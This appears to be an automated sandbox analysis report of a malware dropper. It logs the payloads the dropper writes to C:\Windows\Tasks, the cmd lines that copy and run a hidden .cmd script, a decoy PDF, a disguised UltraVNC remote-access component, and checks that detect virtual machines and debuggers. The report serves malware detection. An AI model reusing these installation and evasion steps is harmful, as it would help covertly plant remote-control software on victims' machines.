Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | File written: C:\Windows\Tasks\UltraVNC.ini
Source: C:\Windows\Tasks\sync_browser.exe | File opened: C:\Windows\SYSTEM32\RICHED32.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 7q551ugrWe.exe | Static file information: File size 1664495 > 1048576
Source: Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
Source: Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
Source: Nfe70s.UFVVkM.0.dr | Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
Source: 7q551ugrWe.exe | Static PE information: real checksum: 0x2af97 should be: 0x19ec51
Source: Nfe70s.UFVVkM.0.dr | Static PE information: section name: .didat
Source: Nfe70s.UFVVkM.2.dr | Static PE information: section name: .didat
Source: conhost.exe.6.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00413660 push eax; ret 0_2_0041368E
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0CFEF1 push rcx; ret 18_2_00007FF6DC0CFEF2
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0E07F8 push rbp; iretd 18_2_00007FF6DC0E07F9
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0E12EF push rbp; iretd 18_2_00007FF6DC0E12F0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0DDC11 push rax; ret 18_2_00007FF6DC0DDC13
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0DDC01 push rcx; ret 18_2_00007FF6DC0DDC02
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0E1400 push rbp; iretd 18_2_00007FF6DC0E1401
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0DDC21 push rsp; ret 18_2_00007FF6DC0DDC23
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0F8CF9 push 8B481074h; iretd 18_2_00007FF6DC0F8CFF
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0CFEF1 push rcx; ret 23_2_00007FF6DC0CFEF2
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0E07F8 push rbp; iretd 23_2_00007FF6DC0E07F9
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0E12EF push rbp; iretd 23_2_00007FF6DC0E12F0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0DDC11 push rax; ret 23_2_00007FF6DC0DDC13
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0DDC01 push rcx; ret 23_2_00007FF6DC0DDC02
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0E1400 push rbp; iretd 23_2_00007FF6DC0E1401
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0DDC21 push rsp; ret 23_2_00007FF6DC0DDC23
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0F8CF9 push 8B481074h; iretd 23_2_00007FF6DC0F8CFF

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Executable created and started: C:\Windows\Tasks\sync_browser.exe
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\WPSela.LSZr7V
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\Nfe70s.UFVVkM
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\conhost.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\WPSela.LSZr7V
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\Nfe70s.UFVVkM
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\conhost.exe
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\id2rlx.MxYNRd
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\id2rlx.MxYNRd
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\Nfe70s.UFVVkM
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\WPSela.LSZr7V
Source: sync_browser.exe.6.dr | Binary or memory string: bcdedit.exe
Source: sync_browser.exe.6.dr | Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: WPSela.LSZr7V.2.dr | Binary or memory string: bcdedit.exe
Source: WPSela.LSZr7V.2.dr | Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: WPSela.LSZr7V.0.dr | Binary or memory string: bcdedit.exe
Source: WPSela.LSZr7V.0.dr | Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117D50 GetPrivateProfileIntA,18_2_00007FF6DC117D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117E10 GetPrivateProfileIntA,18_2_00007FF6DC117E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,18_2_00007FF6DC117650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117EB0 GetPrivateProfileIntA,18_2_00007FF6DC117EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,18_2_00007FF6DC117750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117F50 GetPrivateProfileIntA,18_2_00007FF6DC117F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,18_2_00007FF6DC1177F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,18_2_00007FF6DC1178E0
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC119A40 GetPrivateProfileIntA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC117BD0 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC117C90 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117D50 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117E10 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117650 GetPrivateProfileIntA, RegCreateKeyExA, RegCreateKeyExA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117EB0 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117750 GetPrivateProfileIntA, RegCloseKey, RegCloseKey, RegCloseKey
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117F50 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC1177F0 GetPrivateProfileIntA, RegQueryValueExA, GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC1178E0 GetPrivateProfileIntA, RegQueryValueExA, RegQueryValueExA, GetPrivateProfileStringA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC119A40 GetPrivateProfileIntA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117BD0 GetPrivateProfileIntA
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC117C90 GetPrivateProfileIntA
                          Source: C:\Windows\SysWOW64\cmd.exe; File created: C:\Windows\Tasks\0271695705143540

                          Hooking and other Techniques for Hiding and Protection

                          Source: initial sample; Icon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC0F48B0 IsIconic, IsWindowVisible, GetWindowRect, SHAppBarMessage
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC0F48B0 IsIconic, IsWindowVisible, GetWindowRect, SHAppBarMessage
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC0F3E20 OpenInputDesktop, GetCurrentThreadId, GetThreadDesktop, GetUserObjectInformationA, SetThreadDesktop, LoadLibraryA, GetProcAddress, GetStockObject, RegisterClassExA, SetEvent, CreateWindowExA, SetTimer, SetWindowLongPtrA, SetClipboardViewer, CreateThread, CloseHandle, GetModuleFileNameA, GetModuleFileNameA, GetModuleFileNameA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, SetEvent, PeekMessageA, Sleep, CreateRectRgn, CombineRgn, DeleteObject, free, SetEvent, SetEvent, SetEvent, TranslateMessage, DispatchMessageA, WaitMessage, DestroyWindow, DestroyWindow, SetEvent, KillTimer, FreeLibrary, FreeLibrary, FreeLibrary, SetThreadDesktop, CloseDesktop
                          Source: C:\Users\user\Desktop\7q551ugrWe.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC129BC0 LoadLibraryA, GetProcAddress, GetProcAddress, GetSystemMetrics, GetCurrentProcessId, ProcessIdToSessionId, CreateToolhelp32Snapshot, Process32First, CloseHandle, FreeLibrary, ProcessIdToSessionId, ProcessIdToSessionId, CloseHandle, FreeLibrary, Process32Next
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 18_2_00007FF6DC0C9D00 OpenSCManagerA, EnumServicesStatusA, GetLastError, EnumServicesStatusA, OpenServiceA, QueryServiceConfigA, GetLastError, QueryServiceConfigA, CloseServiceHandle, CloseServiceHandle
                          Source: C:\Windows\Tasks\sync_browser.exe; Code function: 23_2_00007FF6DC0C9D00 OpenSCManagerA, EnumServicesStatusA, GetLastError, EnumServicesStatusA, OpenServiceA, QueryServiceConfigA, GetLastError, QueryServiceConfigA, CloseServiceHandle, CloseServiceHandle
                          Source: C:\Windows\Tasks\sync_browser.exe; Window / User API: threadDelayed 1108
                          Source: C:\Windows\SysWOW64\timeout.exe; Window / User API: threadDelayed 360
                          Source: C:\Windows\Tasks\sync_browser.exe; Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_18-23060)
                          Source: C:\Users\user\Desktop\7q551ugrWe.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM
                          Source: C:\Windows\SysWOW64\cmd.exe; Dropped PE file which has not been started: C:\Windows\Tasks\Nfe70s.UFVVkM
                          Source: C:\Windows\SysWOW64\cmd.exe; Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe
                          Source: C:\Windows\Tasks\sync_browser.exe; Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_18-23826)
                          Source: C:\Windows\Tasks\sync_browser.exe; API coverage: 3.3 %
                          Source: C:\Windows\Tasks\sync_browser.exe; API coverage: 1.1 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 5432; Thread sleep time: -110800s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7776; Thread sleep count: 61 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 1400; Thread sleep count: 360 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 1400; Thread sleep time: -36000s >= -30000s
                          Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,18_2_00007FF6DC0C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,18_2_00007FF6DC0EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,18_2_00007FF6DC17A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6DC0C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6DC0EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6DC17A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C6060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,18_2_00007FF6DC0C6060
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                          Source: sync_browser.exe, 00000012.00000002.4546943962.000000000089E000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000002.2287519184.0000000000D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end nodegraph_18-22741
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Tasks\sync_browser.exe | Process information queried: ProcessInformation
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC1847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6DC1847E4
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D26B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,18_2_00007FF6DC0D26B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC129BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,18_2_00007FF6DC129BC0
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC1847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6DC1847E4
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC177220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF6DC177220
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC1847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF6DC1847E4
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC177220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF6DC177220
Source: C:\Windows\Tasks\sync_browser.exe | Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe 23_2_00007FF6DC129BC0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D3D50 GetVersionExA,GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,18_2_00007FF6DC0D3D50
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,18_2_00007FF6DC0D74C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0E4D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,18_2_00007FF6DC0E4D7E
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
